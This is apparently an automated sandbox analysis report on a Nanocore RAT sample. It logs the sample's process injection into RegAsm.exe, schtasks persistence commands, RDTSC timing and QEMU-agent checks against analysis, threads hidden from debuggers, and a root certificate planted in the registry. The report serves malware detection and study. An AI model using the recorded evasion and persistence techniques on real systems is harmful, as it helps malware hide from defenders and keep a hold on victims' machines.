Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003202DE second address: 000000000032038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 000000000032038C second address: 000000000032044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000003205CA second address: 00000000003205F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000002802DE second address: 000000000028038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 000000000028038C second address: 000000000028044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000002805CA second address: 00000000002805F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000286AF8 second address: 0000000000286AF8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub ebx, esi 0x0000000d inc ebx 0x0000000e jne 00007FAD4C762418h 0x00000010 jmp 00007FAD4C762412h 0x00000012 test eax, 276D876Eh 0x00000017 mov byte ptr [edx+ecx], al 0x0000001a jmp 00007FAD4C762412h 0x0000001c test edx, eax 0x0000001e inc ecx 0x0000001f jne 00007FAD4C76238Eh 0x00000021 mov al, byte ptr [edx+ecx] 0x00000024 add ebx, esi 0x00000026 xor al, byte ptr [ebx] 0x00000028 jmp 00007FAD4C762412h 0x0000002a pushad 0x0000002b lfence 0x0000002e rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00284447 rdtsc

6_2_00284447

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2864	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 884	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2160	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_007B11C2 GetSystemInfo,

6_2_007B11C2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\	Jump to behavior

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\69577.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\Public\69577.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00284447 rdtsc

6_2_00284447

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00284C64 LdrInitializeThunk,

6_2_00284C64

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00286C05 mov eax, dword ptr fs:[00000030h]	6_2_00286C05
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00285D6F mov eax, dword ptr fs:[00000030h]	6_2_00285D6F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00286BBA mov eax, dword ptr fs:[00000030h]	6_2_00286BBA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_002857CD mov eax, dword ptr fs:[00000030h]	6_2_002857CD

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 280000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exe`
Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exehS
Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
Source: Yara match	File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
Source: Yara match	File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B28F6 bind,		6_2_007B28F6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_007B28C3 bind,		6_2_007B28C3

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
